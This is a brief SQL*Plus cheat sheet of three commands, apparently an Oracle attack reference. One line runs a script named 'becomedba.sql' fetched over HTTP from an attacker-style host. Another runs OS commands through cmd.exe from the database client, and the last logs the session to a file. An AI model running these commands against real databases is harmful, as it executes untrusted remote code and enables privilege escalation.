oracle_cheat
oracle_cheat
SQL*Plus-Commands:
@http://www.orasploit.com/becomedba.sql -- execute a SQL Script from a HTTP server (FTP is also possible)
host cmd.exe /c 0wned > c:\rds8.txt -- run OS commands from sqlplus (on the client), Instead of host the shortcuts ! (unix) or $ (Windows) are also possible
spool c:\myspool.txt -- create a logfile of the SQL*Plus Session called myspool.txt (disable: spool off)